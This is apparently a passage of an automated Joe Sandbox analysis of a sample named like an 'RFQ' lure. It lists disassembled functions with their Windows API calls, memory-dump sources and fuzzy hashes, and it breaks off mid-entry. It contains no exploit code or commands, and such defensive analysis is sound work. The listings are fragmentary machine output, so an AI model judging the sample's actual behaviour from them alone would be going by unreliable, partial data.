                                                                                                                      Function 00078656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00078121
                                                                                                                        • Part of subcall function 0007810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0007812B
                                                                                                                        • Part of subcall function 0007810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0007813A
                                                                                                                        • Part of subcall function 0007810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00078141
                                                                                                                        • Part of subcall function 0007810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00078157
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000786A3
                                                                                                                      • _memcmp.LIBCMT ref: 000786C6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000786FC
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00078703
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: 51d22a5c775c1d482e27962aad1f0648b5767424035e3330ac66f35f504492c0
                                                                                                                      • Instruction ID: 05deaec266112b92b0fd97960efbc982552ecb0530e822edd0d3856a693bcc32
                                                                                                                      • Opcode Fuzzy Hash: 51d22a5c775c1d482e27962aad1f0648b5767424035e3330ac66f35f504492c0
                                                                                                                      • Instruction Fuzzy Hash: 09216971E80109EBDB10DFA4D949BEEB7F8EF45304F15C059E548AB241DB38AE05CBA4
                                                                                                                      Function 0004098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __setmode.LIBCMT ref: 000409AE
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00087896,?,?,00000000), ref: 00025A2C
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00087896,?,?,00000000,?,?), ref: 00025A50
                                                                                                                      • _fprintf.LIBCMT ref: 000409E5
                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00075DBB
                                                                                                                        • Part of subcall function 00044AAA: _flsall.LIBCMT ref: 00044AC3
                                                                                                                      • __setmode.LIBCMT ref: 00040A1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 521402451-0
                                                                                                                      • Opcode ID: 55dc58cf1a02fec356aa3737a2496b26585e77a0cf6c1052691abaca2a56d675
                                                                                                                      • Instruction ID: d216e1dc17a80a1cb113931a3939e434a2c302a9c9732f26ca3f9afeaa197256
                                                                                                                      • Opcode Fuzzy Hash: 55dc58cf1a02fec356aa3737a2496b26585e77a0cf6c1052691abaca2a56d675
                                                                                                                      • Instruction Fuzzy Hash: C61136B19046046FDB14B7B4AC47AFE77A89F42321F644069F204A7183EE745C5287AE
                                                                                                                      Function 00091767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000917A3
                                                                                                                        • Part of subcall function 0009182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0009184C
                                                                                                                        • Part of subcall function 0009182D: InternetCloseHandle.WININET(00000000), ref: 000918E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 112308d022f541c350b2716a65b7fc44924a99feaa913f5133ae1bfb71935b75
                                                                                                                      • Instruction ID: 16296de6651a1d462f8c5bfa5c8711bef99a12c1859c52df183c0c7acbd93f3b
                                                                                                                      • Opcode Fuzzy Hash: 112308d022f541c350b2716a65b7fc44924a99feaa913f5133ae1bfb71935b75
                                                                                                                      • Instruction Fuzzy Hash: 44218031304606BFEF229FA09C41BFBBBE9FB49750F10442AF95196651DB719811BBA0
                                                                                                                      Function 00083A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(?,000AFAC0), ref: 00083A64
                                                                                                                      • GetLastError.KERNEL32 ref: 00083A73
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00083A82
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000AFAC0), ref: 00083ADF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2267087916-0
                                                                                                                      • Opcode ID: 4c297766492563d14bc82f18b62df8deeb5de83d6f85d7367d6a82476f8fe0b3
                                                                                                                      • Instruction ID: 65b7e7a5f4adeb738fe6fcc8e0bc1475068a47a4493e2b3b523c2b29440478dc
                                                                                                                      • Opcode Fuzzy Hash: 4c297766492563d14bc82f18b62df8deeb5de83d6f85d7367d6a82476f8fe0b3
                                                                                                                      • Instruction Fuzzy Hash: 7A2183745086029F8714EF68D8818AB77E4BF96764F104A2DF4D9C72A2DB31DE46CB43
                                                                                                                      Function 0007DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0007DCD3,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?), ref: 0007F0CB
                                                                                                                        • Part of subcall function 0007F0BC: lstrcpyW.KERNEL32(00000000,?,?,0007DCD3,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007F0F1
                                                                                                                        • Part of subcall function 0007F0BC: lstrcmpiW.KERNEL32(00000000,?,0007DCD3,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?), ref: 0007F122
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007DCEC
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007DD12
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0007EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0007DD46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 84384a1267ca4d9f0001d9e594dd8f36eef0e820ee4bbc0036d810c9a277428e
                                                                                                                      • Instruction ID: 1e84f5cbd71ccd9b94b13ad06b10a7f67fcfa2c4534dbb1de1bbcca49ade49d4
                                                                                                                      • Opcode Fuzzy Hash: 84384a1267ca4d9f0001d9e594dd8f36eef0e820ee4bbc0036d810c9a277428e
                                                                                                                      • Instruction Fuzzy Hash: 6411E13A600305EBDB249F74CC459BA37B8FF46350B40802AE90ACB2A1EB759C10C7A8
                                                                                                                      Function 000550E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00055101
                                                                                                                        • Part of subcall function 0004571C: __FF_MSGBANNER.LIBCMT ref: 00045733
                                                                                                                        • Part of subcall function 0004571C: __NMSG_WRITE.LIBCMT ref: 0004573A
                                                                                                                        • Part of subcall function 0004571C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 614378929-0
                                                                                                                      • Opcode ID: c0f3d9c7117d0f532c3a525d340c49cdb7136584eb549f60e6583674708f57b6
                                                                                                                      • Instruction ID: 64ae5fae1d2dcfa207454601e54ac7c2c653224019d3598f1d30355c2cc1f8e9
                                                                                                                      • Opcode Fuzzy Hash: c0f3d9c7117d0f532c3a525d340c49cdb7136584eb549f60e6583674708f57b6
                                                                                                                      • Instruction Fuzzy Hash: 4811C4B2900E11AFDB312F70AC597AF3FD89B05363B104939FD449A152DF348944979C
                                                                                                                      Function 000244A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000244CF
                                                                                                                        • Part of subcall function 0002407C: _memset.LIBCMT ref: 000240FC
                                                                                                                        • Part of subcall function 0002407C: _wcscpy.LIBCMT ref: 00024150
                                                                                                                        • Part of subcall function 0002407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00024160
                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00024524
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00024533
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0005D4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1378193009-0
                                                                                                                      • Opcode ID: d692ffc10703aba676216f42b0283f78554f9b35b28a05181c51e6f0cb8379a9
                                                                                                                      • Instruction ID: f9b9b2493ba4d6b0f2db277d44d5caeb25671208eabc3b18457edbc752bbd1f9
                                                                                                                      • Opcode Fuzzy Hash: d692ffc10703aba676216f42b0283f78554f9b35b28a05181c51e6f0cb8379a9
                                                                                                                      • Instruction Fuzzy Hash: 7721C570904BA49FF772CB249855BEBBBEC9B06319F04049EEBDA5A142C3746988CB51
                                                                                                                      Function 00096369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00087896,?,?,00000000), ref: 00025A2C
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00087896,?,?,00000000,?,?), ref: 00025A50
                                                                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00096399
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 000963A4
                                                                                                                      • _memmove.LIBCMT ref: 000963D1
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 000963DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      • Opcode ID: 97a3bdf2f1941e61753b5e150ad40f069b59b05fcc8b945b12deee312fffd387
                                                                                                                      • Instruction ID: 9b2fcad6a03c762c2be8ea94c72edb67667ae532578744268534b7d99f7b969c
                                                                                                                      • Opcode Fuzzy Hash: 97a3bdf2f1941e61753b5e150ad40f069b59b05fcc8b945b12deee312fffd387
                                                                                                                      • Instruction Fuzzy Hash: 74118E32500509AFCF00FBA4ED46CEEB7B8AF05310B044165F506B7162DF35AE04DBA5
                                                                                                                      Function 00078B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00078B61
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00078B73
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00078B89
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00078BA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 4ab6638ffb3d28b0cb565a02b1ce8cea6e5131574b5a976362fad4948502012b
                                                                                                                      • Instruction ID: 52c04a05d1595f102657e8c850e69116e19492a9854c90ce9f0a0f8b4cd95146
                                                                                                                      • Opcode Fuzzy Hash: 4ab6638ffb3d28b0cb565a02b1ce8cea6e5131574b5a976362fad4948502012b
                                                                                                                      • Instruction Fuzzy Hash: C7110A79D41218FFEB11DB95C885EADBBB4EB48710F208095EA04B7250DB716E11DB94
                                                                                                                      Function 00021290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 000212D8
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0005B5FB
                                                                                                                      • GetCursorPos.USER32(?), ref: 0005B605
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0005B610
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4127811313-0
                                                                                                                      • Opcode ID: 3c4e4199a9c5b60cee00ae8453a7b9ab83c5c9cbbcb3f701731df2ae12c27ee7
                                                                                                                      • Instruction ID: 4816227ec720fa7000fb33f33d0ef47290f9d6d08c4a4220a6ddb40ada4a22f2
                                                                                                                      • Opcode Fuzzy Hash: 3c4e4199a9c5b60cee00ae8453a7b9ab83c5c9cbbcb3f701731df2ae12c27ee7
                                                                                                                      • Instruction Fuzzy Hash: A5113D35900429EFDB10DFA4E8859FE77B8EB16301F500456F941E7141D734BA658BA5
                                                                                                                      Function 00081142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 0008115F
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 00081184
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 0008118E
                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0007FCED,?,00080D40,?,00008000), ref: 000811C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: 626dccef5a54e3a3dedc5e3f85c926bbeb5da88ef0c81356433c0f1fea819abf
                                                                                                                      • Instruction ID: 7cb1e35b3e06401042aaa0bfdda6d825fd0d42ccd109f8ef0e30e956601b9ec5
                                                                                                                      • Opcode Fuzzy Hash: 626dccef5a54e3a3dedc5e3f85c926bbeb5da88ef0c81356433c0f1fea819abf
                                                                                                                      • Instruction Fuzzy Hash: 56112A31D4091DD7DF00AFE5D848AEEBBB8FF09711F004055EA85B2240CB749552CBE5
                                                                                                                      Function 0007D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0007D84D
                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0007D864
                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0007D879
                                                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0007D897
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352324309-0
                                                                                                                      • Opcode ID: e2c9c23cd88f67651e171af3d89d63097e6b51535279c4eb2935bbee59671bfd
                                                                                                                      • Instruction ID: da8de28edb62908f2a4081955c1859640ee38e05e10c5205b6f47f12db28ed34
                                                                                                                      • Opcode Fuzzy Hash: e2c9c23cd88f67651e171af3d89d63097e6b51535279c4eb2935bbee59671bfd
                                                                                                                      • Instruction Fuzzy Hash: 5911A5B5A05705DBF3208F90DC08FA7BBBCEF04700F10C56AA519C6040DBB9E5049BB6
                                                                                                                      Function 00056FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                      • Instruction ID: 49e5f5116af8571affe34edc8bb789376f70d3542898531f28d589c8e182f01c
                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                      • Instruction Fuzzy Hash: E4017B3244814AFBCF225E84EC05CEE3FA6BB18352B488415FE1C59071D236C9B9BB81
                                                                                                                      Function 000AB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000AB2E4
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000AB2FC
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000AB320
